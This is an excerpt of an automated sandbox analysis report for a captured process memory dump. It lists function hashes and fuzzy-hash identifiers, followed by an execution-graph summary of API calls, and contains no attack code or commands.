                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d86981184c68ee42c7d286d1427ef2d45c5a34847501bb62967665e63090c9a
                                                                    • Instruction ID: e34e8bfc39e17719336eca8149dde2054e9a004107a8c1470d2224d9f9386b81
                                                                    • Opcode Fuzzy Hash: 8d86981184c68ee42c7d286d1427ef2d45c5a34847501bb62967665e63090c9a
                                                                    • Instruction Fuzzy Hash: EE014834105605CFC726DF28C5908A6FBB1FF45314355CA8AD49A8BA12D731FD8BCB91
                                                                    Function 0147F2B0 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: beab1b5896415aef4e1e8227d86401bb1d52bbfcfe262c920fb589ee74b51513
                                                                    • Instruction ID: 7bf8e12b104e60ac13fd3e6d016904f009e4d591d268ef2619ce0014213469ed
                                                                    • Opcode Fuzzy Hash: beab1b5896415aef4e1e8227d86401bb1d52bbfcfe262c920fb589ee74b51513
                                                                    • Instruction Fuzzy Hash: 38016270E0010ADFCB51DFBD98915DEBBF0EB48210B10856AD458F3300EB354946CF91
                                                                    Function 0147B7D0 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0513e4e7804788841ba779d928c47943f8b6be3148dd3d5eb6a79792a5ef1060
                                                                    • Instruction ID: 826b8314fd3b1ec2ae19544e31494457313d6e854287942a3834856b1e0db3fd
                                                                    • Opcode Fuzzy Hash: 0513e4e7804788841ba779d928c47943f8b6be3148dd3d5eb6a79792a5ef1060
                                                                    • Instruction Fuzzy Hash: C9F0F671F002168F8B61EF7CA8615EFBBF5EBC9250701012AC949E3302EB314A028BC1
                                                                    Function 0147B6C8 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe0bbd4c09f97c4dd495a3bd315c52452f44bf54dffb75b9e01609c655bcb392
                                                                    • Instruction ID: d45a42e0be6dec0323df0ab1f5334fe22edc109a0945706c8c3f506a62a41e1d
                                                                    • Opcode Fuzzy Hash: fe0bbd4c09f97c4dd495a3bd315c52452f44bf54dffb75b9e01609c655bcb392
                                                                    • Instruction Fuzzy Hash: A1018CB0A0421A9F8B51DFB9A8916EEBFF4FF49610F14417AD508F7202EB309946CBD1
                                                                    Function 01477588 Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: efe0832e039a605dfb556c801de0c751d950bea4cd321ef369244290f77f57dd
                                                                    • Instruction ID: 75cc9112bd9d66be7bdefdda6402c0512dd30ce5c2576164ccb18a77dd8742a8
                                                                    • Opcode Fuzzy Hash: efe0832e039a605dfb556c801de0c751d950bea4cd321ef369244290f77f57dd
                                                                    • Instruction Fuzzy Hash: E7012830A04245DBC715EF68E5585AABBB4FB44202F0041AECC09E76A5FE399D94CB82
                                                                    Function 0147B137 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1c911e77e3c8248b142df0da607f558f38d14050ca04adc40bd7d466259ac65
                                                                    • Instruction ID: ceab35902f6016993a55cb9ab8a1ab92bdafb027b6233605266e3bf7b51abf78
                                                                    • Opcode Fuzzy Hash: f1c911e77e3c8248b142df0da607f558f38d14050ca04adc40bd7d466259ac65
                                                                    • Instruction Fuzzy Hash: C4F08CB5E042099ECB24EFB9A8955EEBFF4FB99210B0000BAC905E7345EB314D49CB91
                                                                    Function 0147B550 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 240c9dd000345bfad813b4fac6aa04c8f32767403952b06bfa3abab7b0e46fe2
                                                                    • Instruction ID: 6d37c516b359f554c0d49f592f6cf93b7082ebbd98b9fb8a7c526a7d970d0671
                                                                    • Opcode Fuzzy Hash: 240c9dd000345bfad813b4fac6aa04c8f32767403952b06bfa3abab7b0e46fe2
                                                                    • Instruction Fuzzy Hash: FFF0AFB1E042168F8B549FBAA8815EFBBB0EF48710B00406AD909F3201EB304945CB95
                                                                    Function 01478800 Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b35854be3c7720007fd04d0d202cab53869a8e1ccdcbd86e713418ec2604d57f
                                                                    • Instruction ID: bb367522513f6f38bd0dbf40fb0138ee5455679ecd77353f3e9bc9b956f17d0e
                                                                    • Opcode Fuzzy Hash: b35854be3c7720007fd04d0d202cab53869a8e1ccdcbd86e713418ec2604d57f
                                                                    • Instruction Fuzzy Hash: 04011671D0474BCADB09CFE1C9405DEBBB2BF85300F21851AD404BB624EBB0A986CB40
                                                                    Function 0147807E Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85cac5c7352d8360b901d7db46568efb048068ec1781e8d597e996998332b00c
                                                                    • Instruction ID: 55b8f2376023e6f31dc91c8baf02e635db809cec679302ecf37db930dc0a3d6b
                                                                    • Opcode Fuzzy Hash: 85cac5c7352d8360b901d7db46568efb048068ec1781e8d597e996998332b00c
                                                                    • Instruction Fuzzy Hash: 0E01DA34F4420A8BCB84DF64F9AC57EB772EB84340B50896AD812A7398DE385C529B81
                                                                    Function 0147E7D8 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 931411efa58d17e17865373bd091f37ff008a6ef20db9b7ae25d584c8428cc8c
                                                                    • Instruction ID: 9b24c5da5e15a83b4c0ba10500ce753bd8480567c4f5715e44f744def5046289
                                                                    • Opcode Fuzzy Hash: 931411efa58d17e17865373bd091f37ff008a6ef20db9b7ae25d584c8428cc8c
                                                                    • Instruction Fuzzy Hash: AEF0AF71E04249CFCB51EFBCD8919DEBBF1EB89250B1441AAD918F7302EA314D02CB91
                                                                    Function 01471DFD Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87bc0eab071bbc4929672c7bc0152fcfdc43a9475411bdbf5afbd0d4a88584a1
                                                                    • Instruction ID: e01c76069b64f312618eec52ab9213b1c2a78b4e20fd211a36bcd2b5494102f7
                                                                    • Opcode Fuzzy Hash: 87bc0eab071bbc4929672c7bc0152fcfdc43a9475411bdbf5afbd0d4a88584a1
                                                                    • Instruction Fuzzy Hash: 8601D1309043418FCB06EFB8E88059C7FB0EF42210B440AF9C800AB936EF785E8ACB41
                                                                    Function 014709D5 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90fe1074bf42f768c249ad2b20c981cc3cdb46d77c397e50cb8dd458b6876c1b
                                                                    • Instruction ID: 3e329969651e02def0082cdd2b686950e6f9563bcb56df9028dcf40f9b5c022e
                                                                    • Opcode Fuzzy Hash: 90fe1074bf42f768c249ad2b20c981cc3cdb46d77c397e50cb8dd458b6876c1b
                                                                    • Instruction Fuzzy Hash: 38F0E9D041F389C6DB366A98905D275BE94DB93704F481A67E9804F1AFCD30445DC381
                                                                    Function 014774B9 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bfa118fab122faed0cc291a241e1347a0603966863d71f56e1736f886a3728d0
                                                                    • Instruction ID: 062b1e5b0eb8b15ef860fcf9624fec2ff5dba90b226a8c86d94e733ffdf8ac06
                                                                    • Opcode Fuzzy Hash: bfa118fab122faed0cc291a241e1347a0603966863d71f56e1736f886a3728d0
                                                                    • Instruction Fuzzy Hash: FD01C2B0505281DFC706CF38D980A987BB6EF45300F1045F9E809EB266EA386E85E752
                                                                    Function 01477539 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11a5c438157c8f7a2c97194c111d0bc133dea410492848a906f4cd43e1fd68a0
                                                                    • Instruction ID: d770f1efc9750de7702ff0a63ff615b69acb99abae30549411ccce49713b25d4
                                                                    • Opcode Fuzzy Hash: 11a5c438157c8f7a2c97194c111d0bc133dea410492848a906f4cd43e1fd68a0
                                                                    • Instruction Fuzzy Hash: 5BE0D1357052525BC716176E14201FF77E75FD716132404ABEC04DB791DD345D474392
                                                                    Function 01477460 Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1c102de38ca511003fc74c8b68db5573d9ed60f9bdb136b7bb4e0fcbafebd68
                                                                    • Instruction ID: 206293bee7d022cb5177729dd3b605ca6602fa1c268a0115cca20087f03f99c4
                                                                    • Opcode Fuzzy Hash: c1c102de38ca511003fc74c8b68db5573d9ed60f9bdb136b7bb4e0fcbafebd68
                                                                    • Instruction Fuzzy Hash: ACE09B213041218BC7162B7995241AD7799DF87691B1040FBCD05CB369DE799D4543C3
                                                                    Function 014774C8 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 254a0aaaebad7358facf3159ebe4aa9ef2242b5751c0e683fdf16afd4c35d324
                                                                    • Instruction ID: 4da02b476dc93c98b919304aa66011813c824681994aa9869e5476d0753a4703
                                                                    • Opcode Fuzzy Hash: 254a0aaaebad7358facf3159ebe4aa9ef2242b5751c0e683fdf16afd4c35d324
                                                                    • Instruction Fuzzy Hash: F4F082B0600205EFC746DF68E980E4977FAEF44700F1055B8E90DE7225EF386E80AB91
                                                                    Function 01471E10 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 883a31c74df16f026927f1c34dfdbe343bda56568ec20ee75f91e08df02db76a
                                                                    • Instruction ID: 6e11ea965bba27d603df4abfa4ab7a8fa554e2706b61987589c73b67001e24da
                                                                    • Opcode Fuzzy Hash: 883a31c74df16f026927f1c34dfdbe343bda56568ec20ee75f91e08df02db76a
                                                                    • Instruction Fuzzy Hash: 59F05E709102059FC715FFB8E98094C7BB1EF41311F504AB8D804A7238EF78AE859B81
                                                                    Function 0147EF80 Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f25ced8043801586bb08727140b75e75006f428a9a8ac5280defaed5bcdacf46
                                                                    • Instruction ID: b1958677dda76ebc26d62ca53d2f4ee12b519c3c651ccd52710042c1a16b205c
                                                                    • Opcode Fuzzy Hash: f25ced8043801586bb08727140b75e75006f428a9a8ac5280defaed5bcdacf46
                                                                    • Instruction Fuzzy Hash: 14E0DF22B004416B9B61863D6CA10E9A7D6869927433CCBF2F434EB7E1EA30CC438280
                                                                    Function 014780B1 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bc9d3a81e5021ffec0919d474fde5fe0074710c04691aa07aac27a2d0a6e5a0
                                                                    • Instruction ID: 92c5e3f778bd0abcd62b500f9615be2b8ed01f454fbefa5c0ea0358f1dd8eacc
                                                                    • Opcode Fuzzy Hash: 4bc9d3a81e5021ffec0919d474fde5fe0074710c04691aa07aac27a2d0a6e5a0
                                                                    • Instruction Fuzzy Hash: 62F0FE34F4411A8BCB44DB64F9985BEB772EB84340B508869D81297394DE785C529B81
                                                                    Function 0147EF88 Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54d12cc9b3d2dd3310b4db41c37f57625a0157345034f0751ca5fd165abbf31b
                                                                    • Instruction ID: 2d8e895c5185f712447b4ad6ab99af3e76dee13b2c74d16cd3e4a651630bb6ea
                                                                    • Opcode Fuzzy Hash: 54d12cc9b3d2dd3310b4db41c37f57625a0157345034f0751ca5fd165abbf31b
                                                                    • Instruction Fuzzy Hash: 50E08622F014516BDB10956D9C605D5F6C9875927473D87B2F528EB7A1FA31DC0243C1
                                                                    Function 01477548 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6f02fa314804f33b0649ce4ff722f55102fc18d89f85e9117426e3d1666d4b12
                                                                    • Instruction ID: d53fc198b96bba3efc8fb50384b05010c6493c2c5b74518c9a0c5f4c3927aea8
                                                                    • Opcode Fuzzy Hash: 6f02fa314804f33b0649ce4ff722f55102fc18d89f85e9117426e3d1666d4b12
                                                                    • Instruction Fuzzy Hash: BFD0C221302216130A69326F20104BF269B8FD6461320002FF809E7340CE78AC0303D1
                                                                    Function 01471718 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c5b4c1700098e335bbab62a0441969ed28b60e1ecde3e2e6f172323f10561fdf
                                                                    • Instruction ID: 5a46981af0cac7227ae59e32b0abe7a51cecfb59d98d59fc497d26233eeb6681
                                                                    • Opcode Fuzzy Hash: c5b4c1700098e335bbab62a0441969ed28b60e1ecde3e2e6f172323f10561fdf
                                                                    • Instruction Fuzzy Hash: 6BE0C2313002005FC354963EE88485BB7DEEFCA22131404B9F10DCB365CDA4CC0243D0
                                                                    Function 01472EE0 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9da3292d1d66e29572231270c74978c47b823969d76f8a22bf094473534d2531
                                                                    • Instruction ID: 8b8dcdb3262a8d89665e2e7df6fe40c34f4dc44ae27e63b34a4bd83d9866e3da
                                                                    • Opcode Fuzzy Hash: 9da3292d1d66e29572231270c74978c47b823969d76f8a22bf094473534d2531
                                                                    • Instruction Fuzzy Hash: 7EE0927090938AEFCB12CFA8D91408DBFF8EF06204B0041DAD804DB251E7311F44D752
                                                                    Function 01472EF0 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ab968e51ae16eaec074c45441e57b1f4e68b328e08eb1d518a5b089efe20ae4
                                                                    • Instruction ID: 584b1d904f18e0bc503c24d53bf8463fdf02929a138893fb4d5461ba286f0bfb
                                                                    • Opcode Fuzzy Hash: 2ab968e51ae16eaec074c45441e57b1f4e68b328e08eb1d518a5b089efe20ae4
                                                                    • Instruction Fuzzy Hash: 80D01770A01209EFCB44DFA8EA4059DBBF9EB44204B1045A9A808E7240EA312F449B91
                                                                    Function 014780E4 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2e8b8eafe2ae529e4031189bfa2d7d44452bfb3c37570a0e4fe04dc25724c029
                                                                    • Instruction ID: b92d964a103669d6535855f9bd4c09eb1691e72416732d2eea9ca2a9b941247e
                                                                    • Opcode Fuzzy Hash: 2e8b8eafe2ae529e4031189bfa2d7d44452bfb3c37570a0e4fe04dc25724c029
                                                                    • Instruction Fuzzy Hash: E4D05E30F401298BCB049668B8982AD7732E784350F104865C80597284DE384D128B81
                                                                    Function 014775E6 Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 707fedc25f4f103d7a77b33e4bc6c56998a469ede138e67d65f57a7ea24b80b0
                                                                    • Instruction ID: ffed6cbf369f9cb67bcbab2b0f2b8bfda39462a4bc9a8d066eb37965831ed265
                                                                    • Opcode Fuzzy Hash: 707fedc25f4f103d7a77b33e4bc6c56998a469ede138e67d65f57a7ea24b80b0
                                                                    • Instruction Fuzzy Hash: 53C012302001058BC61AFF58E8988253755FBC0302B00046CDC0ABB2A4EE399C60CB12
                                                                    Function 01470986 Relevance: .0, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20657472e6c8a9654bc9423250e0a8ae065b3c14138aad92ead184f7ed42ea5f
                                                                    • Instruction ID: 923306e9cb87be70771f7be427e99a967fee9fe9905f98a0dca18155e6c14a2e
                                                                    • Opcode Fuzzy Hash: 20657472e6c8a9654bc9423250e0a8ae065b3c14138aad92ead184f7ed42ea5f
                                                                    • Instruction Fuzzy Hash: 1CC08CF081638ACAFF345364D80E3A8BEA9E7C6701F040017B0834E2EE8E384819CB13
                                                                    Function 014709A2 Relevance: .0, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df5480140fa4a0ec4bd6b126eec74355a1704aa2b86432a4440a45b53c643f7d
                                                                    • Instruction ID: b20023facdfa6869651bd5c27f8578161b397ec5dd2a493172a381217c41400e
                                                                    • Opcode Fuzzy Hash: df5480140fa4a0ec4bd6b126eec74355a1704aa2b86432a4440a45b53c643f7d
                                                                    • Instruction Fuzzy Hash: D5C080F0405345C6FF345364D40D3647FA4D745700F040012B4434E1ED8D344415C713

                                                                    Execution Graph

                                                                    Execution Coverage:16.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:165
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 23987 dc0888 23988 dc08a3 23987->23988 23992 dc7588 23988->23992 24012 dc75e6 23988->24012 23989 dc0902 23993 dc75b7 23992->23993 23994 dc7602 23993->23994 24032 dc7f70 23993->24032 24040 dc7fb4 23993->24040 24045 dc7e38 23993->24045 24053 dc7ebf 23993->24053 24061 dc807e 23993->24061 24066 dc7ffd 23993->24066 24071 dc7f03 23993->24071 24079 dc7ea2 23993->24079 24087 dc7f20 23993->24087 24095 dc7ee6 23993->24095 24103 dc7e85 23993->24103 24111 dc804b 23993->24111 24116 dc7e29 23993->24116 24124 dc7e68 23993->24124 24132 dc802f 23993->24132 24137 dc7f8d 23993->24137 24142 dc7f53 23993->24142 23994->23989 24013 dc75f1 24012->24013 24014 dc7ffd MonitorFromPoint 24013->24014 24015 dc807e MonitorFromPoint 24013->24015 24016 dc7ebf 3 API calls 24013->24016 24017 dc7e38 3 API calls 24013->24017 24018 dc7fb4 MonitorFromPoint 24013->24018 24019 dc7f70 3 API calls 24013->24019 24020 dc7602 24013->24020 24021 dc7f53 3 API calls 24013->24021 24022 dc7f8d MonitorFromPoint 24013->24022 24023 dc802f MonitorFromPoint 24013->24023 24024 dc7e68 3 API calls 24013->24024 24025 dc7e29 3 API calls 24013->24025 24026 dc804b MonitorFromPoint 24013->24026 24027 dc7e85 3 API calls 24013->24027 24028 dc7ee6 3 API calls 24013->24028 24029 dc7f20 3 API calls 24013->24029 24030 dc7ea2 3 API calls 24013->24030 24031 dc7f03 3 API calls 24013->24031 24014->24020 24015->24020 24016->24020 24017->24020 24018->24020 24019->24020 24020->23989 24021->24020 24022->24020 24023->24020 24024->24020 24025->24020 24026->24020 24027->24020 24028->24020 24029->24020 24030->24020 24031->24020 24033 dc7f75 24032->24033 24034 dc7f8b 24033->24034 24150 50a0a6a 24033->24150 24154 50a0a7c 24033->24154 24035 dc8099 24034->24035 24158 50a3048 24034->24158 24162 50a3058 24034->24162 24035->23994 24041 dc7fb9 24040->24041 24042 dc8099 24041->24042 24043 50a3048 MonitorFromPoint 24041->24043 24044 50a3058 MonitorFromPoint 24041->24044 24042->23994 24043->24042 24044->24042 24046 dc7e5e 24045->24046 24047 dc7f8b 24046->24047 24051 50a0a6a KiUserExceptionDispatcher 24046->24051 24052 50a0a7c KiUserExceptionDispatcher 24046->24052 24048 dc8099 24047->24048 24049 50a3048 MonitorFromPoint 24047->24049 24050 50a3058 MonitorFromPoint 24047->24050 24048->23994 24049->24048 24050->24048 24051->24047 24052->24047 24054 dc7ec4 24053->24054 24055 dc7f8b 24054->24055 24057 50a0a6a KiUserExceptionDispatcher 24054->24057 24058 50a0a7c KiUserExceptionDispatcher 24054->24058 24056 dc8099 24055->24056 24059 50a3048 MonitorFromPoint 24055->24059 24060 50a3058 MonitorFromPoint 24055->24060 24056->23994 24057->24055 24058->24055 24059->24056 24060->24056 24062 dc8083 24061->24062 24063 dc8099 24062->24063 24064 50a3048 MonitorFromPoint 24062->24064 24065 50a3058 MonitorFromPoint 24062->24065 24063->23994 24064->24063 24065->24063 24067 dc8002 24066->24067 24068 dc8099 24067->24068 24069 50a3048 MonitorFromPoint 24067->24069 24070 50a3058 MonitorFromPoint 24067->24070 24068->23994 24069->24068 24070->24068 24072 dc7f08 24071->24072 24073 dc7f8b 24072->24073 24077 50a0a6a KiUserExceptionDispatcher 24072->24077 24078 50a0a7c KiUserExceptionDispatcher 24072->24078 24074 dc8099 24073->24074 24075 50a3048 MonitorFromPoint 24073->24075 24076 50a3058 MonitorFromPoint 24073->24076 24074->23994 24075->24074 24076->24074 24077->24073 24078->24073 24080 